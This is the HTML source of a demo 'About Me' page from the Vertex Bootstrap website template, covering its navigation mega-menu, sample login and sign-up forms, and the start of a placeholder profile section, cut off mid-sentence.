﻿<!DOCTYPE html>

<html>
<head>
    <meta charset="utf-8">
    <title>Vertex - Responsive HTML5 Bootstrap Template</title>
    <meta name="keywords" content="HTML5 Template" />
    <meta name="description" content="Vertex - Responsive HTML5 Template">
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <link rel="shortcut icon" type="image/png" href="img/favicon.png" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <!-- Web Fonts  -->
    <link href="../fonts.googleapis.com/css.css" rel="stylesheet">

    <!-- Libs CSS -->
    <link href="css/bootstrap.min.css" rel="stylesheet" />
    <link href="css/style.css" rel="stylesheet" />
    <link href="css/font-awesome.min.css" rel="stylesheet" />
    <link href="css/streamline-icon.css" rel="stylesheet" />
    <link href="css/header.css" rel="stylesheet" />
    <link href="css/portfolio.css" rel="stylesheet" />
    <link href="css/blog.css" rel="stylesheet" />
    <link href="css/v-animation.css" rel="stylesheet" />
    <link href="css/v-bg-stylish.css" rel="stylesheet" />
    <link href="css/font-icons.css" rel="stylesheet" />
    <link href="css/shortcodes.css" rel="stylesheet" />
    <link href="css/utilities.css" rel="stylesheet" />
    <link href="css/theme-responsive.css" rel="stylesheet" />
    <link href="plugins/aos/aos.css" rel="stylesheet" />
    <link href="plugins/owl-carousel/owl.theme.css" rel="stylesheet" />
    <link href="plugins/owl-carousel/owl.carousel.css" rel="stylesheet" />

    <!-- Current Page CSS -->
    <link href="plugins/rs-plugin/css/settings.css" rel="stylesheet" />

    <!-- Skin -->
    <link rel="stylesheet" href="css/skin/default.css">

    <!-- Custom CSS -->
    <link rel="stylesheet" href="css/custom.css">
</head>

<body>

    <!--Header-->
    <header id="header" class="header-effect-reveal" data-plugin-options="{'stickyEnabled': true, 'stickyEnableOnBoxed': true, 'stickyEnableOnMobile': true, 'stickyStartAt': 70}">
        <div class="header-body">
            <div class="header-container container">
                <div class="header-row">
                    <div class="header-column justify-content-start">
                        <div class="header-logo">
                            <a href="index.html">
                                <img alt="Vertex" width="130" src="img/logo.png">
                            </a>
                        </div>
                    </div>
                    <div class="header-column justify-content-end">
                        <div class="header-nav header-nav-light-dropdown">
                            <div class="header-nav-main header-nav-main-effect-1 header-nav-main-sub-effect-1">
                                <nav class="collapse">
                                    <ul class="nav flex-column flex-lg-row" id="mainNav">
                                        <li class="dropdown dropdown-mega">
                                            <a class="dropdown-item dropdown-toggle" href="page-about-me-3.html#">
                                                Home
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li>
                                                    <div class="dropdown-mega-content">
                                                        <div class="row">
                                                            <div class="col-lg-3 dropdown-mega-sub-content-block overlay overlay-show overlay-color-primary d-none d-lg-block">
                                                                <span class="top-sub-title text-color-light-2 d-block">THE MOST</span>
                                                                <span class="text-color-light font-weight-bold d-block text-4 mb-2">POWERFUL</span>
                                                                <p class="text-color-light-2">A revolutionary theme trusted by tons of customers</p>
                                                                <a class="btn btn-dark btn-rounded btn-v-3 btn-h-2 content-block-button font-weight-semibold" href="page-about-me-3.html#">GET STARTED</a>
                                                            </div>
                                                            <div class="col-lg-3 ml-auto">
                                                                <span class="dropdown-mega-sub-title">MULTI PURPOSE</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="index.html">Home - Variation 1</a></li>
                                                                    <li><a class="dropdown-item" href="index-2.html">Home - Variation 2</a></li>
                                                                    <li><a class="dropdown-item" href="index-3.html">Home - Variation 3</a></li>
                                                                    <li><a class="dropdown-item" href="index-4.html">Home - Variation 4</a></li>
                                                                    <li><a class="dropdown-item" href="index-5.html">Home - Variation 5</a></li>
                                                                    <li><a class="dropdown-item" href="index-6.html">Home - Variation 6</a></li>
                                                                    <li><a class="dropdown-item" href="index-7.html">Home - Variation 7</a></li>
                                                                    <li><a class="dropdown-item" href="index-8.html">Home - Variation 8</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">PORTFOLIO</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="index-9.html">Home - Variation 9 </a></li>
                                                                    <li><a class="dropdown-item" href="index-10.html">Home - Variation 10 <span class="badge badge-warning badge-sm ml-1">Gap Outside</span></a></li>
                                                                    <li><a class="dropdown-item" href="index-11.html">Home - Variation 11</a></li>
                                                                </ul>
                                                                <span class="dropdown-mega-sub-title">Contact Us</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="contact-us.html">Contact Us</a></li>
                                                                    <li><a class="dropdown-item" href="contact-us-2.html">Contact Us 2</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">About Us</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="page-about-us.html">About Us</a></li>
                                                                    <li><a class="dropdown-item" href="page-about-us-2.html">About Us 2</a></li>
                                                                    <li><a class="dropdown-item" href="page-about-us-3.html">About Us 3</a></li>
                                                                    <li><a class="dropdown-item" href="page-about-us-4.html">About Us 4</a></li>
                                                                </ul>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </li>
                                            </ul>
                                        </li>
                                        <li class="dropdown dropdown-mega dropdown-mega-style-2">
                                            <a class="dropdown-item dropdown-toggle" href="page-about-me-3.html#">
                                                Elements
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li>
                                                    <div class="dropdown-mega-content container">
                                                        <div class="row">
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">ELEMENTS 1</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="element-content-carousel.html"><i class="icon-list-1 menu-icon"></i>Content Carousel</a></li>
                                                                    <li><a class="dropdown-item" href="element-common2.html#modal-windows"><i class="icon-outbox-2 menu-icon"></i>Modal Windows</a></li>
                                                                    <li><a class="dropdown-item" href="element-testimonials.html"><i class="icon-chat-2 menu-icon"></i>Testimonials</a></li>
                                                                    <li><a class="dropdown-item" href="element-brands-clients.html"><i class="icon-connection-2 menu-icon"></i>Brands & Clients</a></li>
                                                                    <li><a class="dropdown-item" href="element-common2.html#image-frames"><i class="icon-photo-frame menu-icon"></i>Image Frames</a></li>
                                                                    <li><a class="dropdown-item" href="element-buttons.html"><i class="icon-cursors menu-icon"></i>Buttons<span class="badge badge-warning badge-sm ml-1">Hot</span></a></li>
                                                                    <li><a class="dropdown-item" href="element-iconboxes.html"><i class="icon-star-1 menu-icon"></i>Animation & Feature Boxes</a></li>
                                                                    <li><a class="dropdown-item" href="element-common2.html#circle-counters"><i class="icon-heart-plus menu-icon"></i>Circle Counters</a></li>
                                                                    <li><a class="dropdown-item" href="page-about-us-2.html"><i class="icon-photo-frame menu-icon"></i>Fancy Heading</a></li>
                                                                    <li><a class="dropdown-item" href="element-common2.html#recent-posts"><i class="icon-rss-1 menu-icon"></i>Recent Posts & News</a></li>
                                                                    <li><a class="dropdown-item" href="element-icon-grid.html"><i class="icon-grid menu-icon"></i>Icon Grids</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">ELEMENTS 2</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="index-3.html"><i class="icon-video-camera-2 menu-icon"></i>Video Section</a></li>
                                                                    <li><a class="dropdown-item" href="element-social-icons.html"><i class="icon-link menu-icon"></i>Social Icons</a></li>
                                                                    <li><a class="dropdown-item" href="element-pricing-tables.html"><i class="icon-money menu-icon"></i>Pricing Tables</a></li>
                                                                    <li><a class="dropdown-item" href="element-charts.html"><i class="icon-business-chart-2 menu-icon"></i>Charts <span class="v-menu-item-info">Hot</span></a></li>
                                                                    <li><a class="dropdown-item" href="element-progress-bar.html"><i class="icon-type-2 menu-icon"></i>Progress Bars</a></li>
                                                                    <li><a class="dropdown-item" href="element-tabs.html"><i class="icon-window-selection-2 menu-icon"></i>Tab Control</a></li>
                                                                    <li><a class="dropdown-item" href="element-team-member.html"><i class="icon-user-star-1 menu-icon"></i>Team Elements</a></li>
                                                                    <li><a class="dropdown-item" href="element-accordion.html"><i class="icon-credit-card menu-icon"></i>Accordion & Toggles</a></li>
                                                                    <li><a class="dropdown-item" href="element-call-to-actions.html"><i class="icon-bookmark-3 menu-icon"></i>Call To Actions <span class="badge badge-warning badge-sm ml-1">Important</span></a></li>
                                                                    <li><a class="dropdown-item" href="element-process-steps.html"><i class="icon-shear-tool menu-icon"></i>Process Steps</a></li>
                                                                    <li><a class="dropdown-item" href="element-animated-headline.html"><i class="icon-cigarette menu-icon"></i>Animated Headline</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">ELEMENTS 3</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="element-common.html#gridsystem"><i class="icon-arrange-4-1 menu-icon"></i>Grid System</a></li>
                                                                    <li><a class="dropdown-item" href="element-common.html#typograpy"><i class="icon-small-caps menu-icon"></i>Typograpy</a></li>
                                                                    <li><a class="dropdown-item" href="element-forms.html"><i class="icon-text menu-icon"></i>Form Elements <span class="badge badge-danger badge-sm ml-1">Hot</span></a></li>
                                                                    <li><a class="dropdown-item" href="element-common.html#lists"><i class="icon-check-list menu-icon"></i>Lists</a></li>
                                                                    <li class="dropdown-submenu">
                                                                        <a class="dropdown-item dropdown-toggle" href="page-about-me-3.html#"><i class="icon-bucket menu-icon"></i> Icons</a>
                                                                        <ul class="dropdown-menu">
                                                                            <li><a class="dropdown-item" href="element-icons.html">Font Awesome Icons</a></li>
                                                                            <li><a class="dropdown-item" href="element-icons-2.html">Streamline Icons</a></li>
                                                                            <li><a class="dropdown-item" href="element-social-icons.html">Social Icons</a></li>
                                                                        </ul>
                                                                    </li>
                                                                    <li><a class="dropdown-item" href="element-common.html#info-messages"><i class="icon-information menu-icon"></i>Info Messages</a></li>
                                                                    <li><a class="dropdown-item" href="element-common.html#heading-options"><i class="icon-megaphone-1 menu-icon"></i>Heading Options</a></li>
                                                                    <li><a class="dropdown-item" href="element-common.html#tagline"><i class="icon-inbox-3 menu-icon"></i>Tagline & Info Boxes</a></li>
                                                                    <li><a class="dropdown-item" href="element-common.html#pagination"><i class="icon-scroll-horizontal-1 menu-icon"></i>Pagination</a></li>
                                                                    <li><a class="dropdown-item" href="element-common.html#separator-divider"><i class="icon-scissor-1 menu-icon"></i>Separator / Divider</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3 dropdown-mega-sub-content-block d-none d-lg-block">
                                                                <img src="img/logo-white.png" class="img-responsive content-block-image" alt="" width="110" />
                                                                <span class="top-sub-title text-color-light-2 d-block">THE MOST</span>
                                                                <span class="text-color-light font-weight-bold d-block text-4 mb-4">POWERFUL</span>
                                                                <p class="text-color-light-2">A revolutionary theme<br> trusted by tons of<br> customers</p>
                                                                <a class="btn d-inline-block content-block-button text-color-primary font-weight-bold p-0" href="page-about-me-3.html#">GET STARTED</a>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a class="dropdown-item dropdown-toggle" href="page-about-me-3.html#">
                                                Features
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-about-me-3.html#"><i class="icon-check-list menu-icon"></i> Headers</a>
                                                    <ul class="dropdown-menu">
                                                        <li class="dropdown-submenu">
                                                            <a class="dropdown-item dropdown-toggle" href="page-about-me-3.html#">Top Bar</a>
                                                            <ul class="dropdown-menu">
                                                                <li><a class="dropdown-item" href="index-header-colored-top-bar.html">Default + Colored Top Bar</a></li>
                                                                <li><a class="dropdown-item" href="index-header-top-bar-search.html">Default + Top Bar with Search</a></li>
                                                                <li><a class="dropdown-item" href="index-header-top-bar-button.html">Default + Top Bar with Button</a></li>
                                                            </ul>
                                                        </li>
                                                        <li><a class="dropdown-item" href="index-header-center.html">Center</a></li>
                                                        <li><a class="dropdown-item" href="index-header-logo-between-menu.html">Logo Between Menu</a></li>
                                                        <li><a class="dropdown-item" href="index-header-below-slider.html">Below Slider</a></li>
                                                        <li><a class="dropdown-item" href="index-header-with-borders.html">With Borders</a></li>
                                                        <li><a class="dropdown-item" href="index-header-full-width.html">Full Width</a></li>
                                                        <li><a class="dropdown-item" href="index-6.html">Floating</a></li>
                                                        <li class="dropdown-submenu">
                                                            <a class="dropdown-item dropdown-toggle" href="page-about-me-3.html#">Transparent</a>
                                                            <ul class="dropdown-menu">
                                                                <li><a class="dropdown-item" href="portfolio-single.html">Transparent</a></li>
                                                                <li><a class="dropdown-item" href="index-8.html">Transparent - Bottom Border</a></li>
                                                                <li><a class="dropdown-item" href="index-header-semi-transparent.html">Semi Transparent</a></li>
                                                                <li><a class="dropdown-item" href="index-11.html">Semi Transparent - Light</a></li>
                                                            </ul>
                                                        </li>
                                                        <li class="dropdown-submenu">
                                                            <a class="dropdown-item dropdown-toggle" href="page-about-me-3.html#">Navbar</a>
                                                            <ul class="dropdown-menu">
                                                                <li><a class="dropdown-item" href="index-header-navbar.html">Navbar</a></li>
                                                                <li><a class="dropdown-item" href="index-header-navbar-centered-logo.html">Navbar - Centered Logo</a></li>
                                                            </ul>
                                                        </li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-about-me-3.html#"><i class="icon-window-2 menu-icon"></i> Navigations</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="index-navigation-top-line.html">Top Line</a></li>
                                                        <li><a class="dropdown-item" href="index-navigation-stripe.html">Stripe</a></li>
                                                        <li><a class="dropdown-item" href="index-navigation-dark-dropdown.html">Dark Dropdown</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-about-me-3.html#"><i class="icon-layers menu-icon"></i> Footers</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="page-404.html#footer">Footer Variation</a></li>
                                                        <li><a class="dropdown-item" href="page-faq.html#footer">Footer Variation 2</a></li>
                                                        <li><a class="dropdown-item" href="page-services.html#footer">Footer Variation 3</a></li>
                                                        <li><a class="dropdown-item" href="index-11.html#footer">Footer Variation 4</a></li>
                                                        <li><a class="dropdown-item" href="feature-footers.html">Footer Variation 5</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-about-me-3.html#"><i class="icon-arrange-3-5 menu-icon"></i> Page Headers</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="index-page-header-left-alignment.html">Left Alignment</a></li>
                                                        <li><a class="dropdown-item" href="index-page-header-center-alignment.html">Center Alignment</a></li>
                                                        <li><a class="dropdown-item" href="index-page-header-right-alignment.html">Right Alignment</a></li>
                                                        <li class="dropdown-submenu">
                                                            <a class="dropdown-item dropdown-toggle" href="page-about-me-3.html#">Colors</a>
                                                            <ul class="dropdown-menu">
                                                                <li><a class="dropdown-item" href="index-page-header-color-primary.html">Primary Color</a></li>
                                                                <li><a class="dropdown-item" href="index-page-header-color-secondary.html">Secondary Color</a></li>
                                                                <li><a class="dropdown-item" href="index-page-header-color-tertiary.html">Tertiary Color</a></li>
                                                                <li><a class="dropdown-item" href="index-page-header-color-quaternary.html">Quaternary Color</a></li>
                                                            </ul>
                                                        </li>
                                                        <li><a class="dropdown-item" href="index-page-header-dark.html">Dark</a></li>
                                                        <li><a class="dropdown-item" href="index-page-header-parallax.html">Parallax</a></li>
                                                        <li><a class="dropdown-item" href="index-page-header-video-background.html">Video Background</a></li>
                                                        <li><a class="dropdown-item" href="index-page-header-mini.html">Mini</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-about-me-3.html#"><i class="icon-board menu-icon"></i> Layout Options</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="index-10-boxed.html">Boxed</a></li>
                                                        <li><a class="dropdown-item" href="index-10.html">Gap Outside</a></li>
                                                    </ul>
                                                </li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a class="dropdown-item dropdown-toggle active" href="page-about-me-3.html#">
                                                Pages
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle current" href="page-about-me-3.html#">About Us</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="page-about-us.html">About Us</a></li>
                                                        <li><a class="dropdown-item" href="page-about-us-2.html">About Us 2</a></li>
                                                        <li><a class="dropdown-item" href="page-about-us-3.html">About Us 3</a></li>
                                                        <li><a class="dropdown-item" href="page-about-us-4.html">About Us 4</a></li>
                                                        <li><a class="dropdown-item" href="page-about-me.html">About Me</a></li>
                                                        <li><a class="dropdown-item" href="page-about-me-2.html">About Me 2</a></li>
                                                        <li><a class="dropdown-item current" href="page-about-me-3.html">About Me 3</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-about-me-3.html#">Contact Us</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="contact-us.html">Contact Us</a></li>
                                                        <li><a class="dropdown-item" href="contact-us-2.html">Contact Us 2</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-about-me-3.html#">Layouts</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="page-right-sidebar.html">Right Sidebar Page</a></li>
                                                        <li><a class="dropdown-item" href="page-left-sidebar.html">Left Sidebar Page</a></li>
                                                        <li><a class="dropdown-item" href="page-left-right-sidebar.html">Left & Right Sidebar Page</a></li>
                                                        <li><a class="dropdown-item" href="page-full-width.html">Full width Page</a></li>
                                                    </ul>
                                                </li>
                                                <li><a class="dropdown-item" href="page-meet-team.html">Team</a></li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-about-me-3.html#">Services</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="page-services.html">Services</a></li>
                                                        <li><a class="dropdown-item" href="page-services-2.html">Services 2</a></li>
                                                    </ul>
                                                </li>
                                                <li><a class="dropdown-item" href="page-careers.html">Careers</a></li>
                                                <li><a class="dropdown-item" href="page-job.html">Job Page</a></li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-about-me-3.html#">Login / Register</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="page-login.html">Login</a></li>
                                                        <li><a class="dropdown-item" href="page-login-2.html">Login 2</a></li>
                                                        <li><a class="dropdown-item" href="page-register.html">Register</a></li>
                                                    </ul>
                                                </li>
                                                <li><a class="dropdown-item" href="page-search-result.html">Search Result</a></li>
                                                <li><a class="dropdown-item" href="page-help.html">Help Page</a></li>
                                                <li><a class="dropdown-item" href="page-author-page.html">Author Page</a></li>
                                                <li><a class="dropdown-item" href="page-pricing.html">Pricing Page</a></li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-about-me-3.html#">Extra</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="page-faq.html">FAQ</a></li>
                                                        <li><a class="dropdown-item" href="page-404.html">404 Error</a></li>
                                                        <li><a class="dropdown-item" href="page-privacy.html">Privacy Page</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-about-me-3.html#">Support</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="changelog.html"><i class="fa fa-terminal"></i>Changelog</a></li>
                                                        <li><a class="dropdown-item" href="theme-plugins.html"><i class="fa fa-star-o"></i>Theme Plugins</a></li>
                                                    </ul>
                                                </li>
                                            </ul>
                                        </li>
                                        <li class="dropdown dropdown-mega dropdown-mega-style-2">
                                            <a class="dropdown-item dropdown-toggle" href="page-about-me-3.html#">
                                                Portfolio
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li>
                                                    <div class="dropdown-mega-content container">
                                                        <div class="row">
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">Portfolio Gallery</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="portfolio-two-gallery.html">Gallery - 2 Columns</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-three-gallery.html">Gallery - 3 Columns</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-four-gallery.html">Gallery - 4 Columns</a></li>
                                                                </ul>
                                                                <span class="dropdown-mega-sub-title">Portfolio Variations</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="portfolio-right-sidebar.html">Right Sidebar</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-left-sidebar.html">Left Sidebar</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">Portfolio Standard</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="portfolio-two-standard.html">Standard - 2 Columns</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-three-standard.html">Standard - 3 Columns</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-four-standard.html">Standard - 4 Columns</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">Portfolio Masonry</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="portfolio-masonry-gallery.html">Gallery</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-masonry-standard.html">Standard</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-masonry-fw.html">Fullwidth Standard</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-masonry-fw-2.html">Fullwidth Gallery</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">Portfolio Single</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="portfolio-single.html">Single</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-slider.html">Slider</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-2.html">Custom</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-gallery.html">Gallery</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-fw.html">Full Width</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-fw-slides.html">Full Width Slides</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-extended.html">Extended <span class="badge badge-warning badge-sm ml-1">Showcase</span> </a></li>
                                                                </ul>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a class="dropdown-item dropdown-toggle" href="page-about-me-3.html#">
                                                Blog
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li><div class="menu-sm-info">Perfect Design</div></li>
                                                <li><a class="dropdown-item" href="blog-standard-sidebar.html"><i class="icon-list-1 menu-icon"></i> Blog Standard</a></li>
                                                <li><a class="dropdown-item" href="blog-mini-sidebar.html"><i class="icon-list-2 menu-icon"></i> Blog Small</a></li>
                                                <li><a class="dropdown-item" href="blog-masonry.html"><i class="icon-arrange-4-1 menu-icon"></i> Blog Masonry</a></li>
                                                <li><a class="dropdown-item" href="blog-masonry-fw.html"><i class="icon-arrange-5 menu-icon"></i> Blog Fullwidth Masonry</a></li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-about-me-3.html#"><i class="icon-link menu-icon"></i>  Blog Posts</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="blog-standard-post.html">Standard Post</a></li>
                                                        <li><a class="dropdown-item" href="blog-full-width-post.html">Full Width Post</a></li>
                                                        <li><a class="dropdown-item" href="blog-standard-post-2.html">Standard Post - Modern</a></li>
                                                        <li><a class="dropdown-item" href="blog-full-width-post-2.html">Full Width Post - Modern</a></li>
                                                    </ul>
                                                </li>
                                            </ul>
                                        </li>

                                        <li class="dropdown dropdown-mega dropdown-mega-signin signin ml-lg-3" id="headerAccount">
                                            <a class="dropdown-item pl-lg-4" href="page-login.html">Sign In</a>
                                            <ul class="dropdown-menu">
                                                <li>
                                                    <div class="dropdown-mega-content">
                                                        <div class="row">
                                                            <div class="col">
                                                                <div class="signin-form">
                                                                    <span class="top-sub-title text-color-light-3">MEMBERSHIP</span>
                                                                    <h2 class="text-4 mb-4 mt-1">Sign In</h2>
                                                                    <form action="page-login.html" id="frmSignIn" method="post">
                                                                        <div class="form-row">
                                                                            <div class="form-group col mb-2">
                                                                                <input type="email" value="" maxlength="100" class="form-control" name="email" id="signInEmail" placeholder="Username" required>
                                                                            </div>
                                                                        </div>
                                                                        <div class="form-row">
                                                                            <div class="form-group col">
                                                                                <input type="password" value="" class="form-control" name="password" id="signInPassword" placeholder="Password" required>
                                                                            </div>
                                                                        </div>
                                                                        <div class="form-row">
                                                                            <div class="form-group col">
                                                                                <div class="form-check checkbox-custom checkbox-default">
                                                                                    <input class="form-check-input" type="checkbox" id="signInRemember">
                                                                                    <label class="form-check-label" for="signInRemember">
                                                                                        Remember me
                                                                                    </label>
                                                                                </div>
                                                                            </div>
                                                                            <div class="form-group col text-right">
                                                                                <a href="page-about-me-3.html#" id="headerRecover" class="forgot-pw text-color-dark d-block">Forgot password?</a>
                                                                            </div>
                                                                        </div>
                                                                        <div class="row align-items-center">
                                                                            <div class="col">
                                                                                <a href="page-about-me-3.html#" id="headerSignUp" class="text-color-primary pl-0">Sign Up Now!</a>
                                                                            </div>
                                                                            <div class="col text-right">
                                                                                <button type="submit" class="btn btn-primary btn-sm pull-right mb-0 mr-0"><i class="fa fa-lock"></i> SIGN IN</button>
                                                                            </div>
                                                                        </div>
                                                                    </form>
                                                                </div>
                                                                <div class="signup-form">
                                                                    <span class="top-sub-title text-color-light-3">MEMBERSHIP</span>
                                                                    <h2 class="text-4 mb-4 mt-1">Sign Up</h2>
                                                                    <form action="page-about-me-3.html#" id="frmSignUp" method="post">
                                                                        <div class="form-row">
                                                                            <div class="form-group col mb-2">
                                                                                <input type="text" value="" class="form-control" name="name" id="signUpName" placeholder="Full Name" required>
                                                                            </div>
                                                                        </div>
                                                                        <div class="form-row">
                                                                            <div class="form-group col mb-2">
                                                                                <input type="email" value="" maxlength="100" class="form-control" name="email" id="signUpEmail" placeholder="E-mail" required>
                                                                            </div>
                                                                        </div>
                                                                        <div class="form-row mb-3">
                                                                            <div class="form-group col">
                                                                                <input type="password" value="" class="form-control" name="password" id="signUpPassword" placeholder="Password" required>
                                                                            </div>
                                                                        </div>
                                                                        <div class="row align-items-center">
                                                                            <div class="col">
                                                                                <a href="page-about-me-3.html#" id="headerSignIn" class="text-color-primary pl-0">Have an account?</a>
                                                                            </div>
                                                                            <div class="col text-right">
                                                                                <button type="submit" class="btn btn-primary btn-sm pull-right mb-0 mr-0">SIGN UP</button>
                                                                            </div>
                                                                        </div>
                                                                    </form>
                                                                </div>
                                                                <div class="recover-form">
                                                                    <span class="top-sub-title text-color-light-3">MEMBERSHIP</span>
                                                                    <h2 class="text-4 mb-4 mt-1">Reset my Password</h2>
                                                                    <form action="page-about-me-3.html#" id="frmResetPassword" method="post">
                                                                        <div class="form-row mb-4">
                                                                            <div class="form-group col mb-2">
                                                                                <input type="email" value="" maxlength="100" class="form-control" name="email" id="resetPasswordEmail" placeholder="E-mail" required>
                                                                            </div>
                                                                        </div>
                                                                        <div class="row align-items-center">
                                                                            <div class="col">
                                                                                <a href="page-about-me-3.html#" id="headerRecoverCancel" class="text-color-primary pl-0">Have an account?</a>
                                                                            </div>
                                                                            <div class="col text-right">
                                                                                <button type="submit" class="btn btn-primary btn-sm pull-right mb-0 mr-0">SUBMIT</button>
                                                                            </div>
                                                                        </div>
                                                                    </form>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </li>
                                            </ul>
                                        </li>
                                    </ul>
                                </nav>
                            </div>
                            <div class="header-button d-none d-sm-flex ml-3">
                                <a class="btn v-btn standard lightgrey sf-icon-reveal mb-0 mr-0" href="https://wrapbootstrap.com/theme/express-business-website-template-WB0TR1711" target="_self">
                                    <i class="icon-cart-4"></i><span class="text text-uppercase">Buy Me</span>
                                </a>
                            </div>
                            <button class="header-btn-collapse-nav ml-3" data-toggle="collapse" data-target=".header-nav-main nav">
                                <span class="hamburguer">
                                    <span></span>
                                    <span></span>
                                    <span></span>
                                </span>
                                <span class="close">
                                    <span></span>
                                    <span></span>
                                </span>
                            </button>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </header>
    <!--End Header-->

    <div role="main" class="main">

        <div class="v-page-wrap no-bottom-spacing no-top-spacing clearfix">

            <div class="v-portfolio-carousel v-bg-stylish no-shadow v-bg-stylish-v4">

                <div class="container">

                    <div class="row pull-top pull-bottom">

                        <div class="col-md-5">
                            <img class="img-responsive w-100 pi-img-round" src="img/team/t1.png">
                        </div>

                        <div class="col-md-7 pt-8 pl-6">
                            <p class="v-smash-text-large">Hello, I am John!</p>
                            <div class="horizontal-break left"></div>
                            <p style="font-size: 1.2rem; line-height: 1.7;">
                                So, whats the difference between this page and the others? Well,
                                this page is using the “home” page template – it looks like like a
                                regular portfolio page with the current settings, but this part is
                                actually a panel. Check out the
                                <a title="Dimple - Standard" href="page-about-me-3.html#" target="_blank">standard</a>
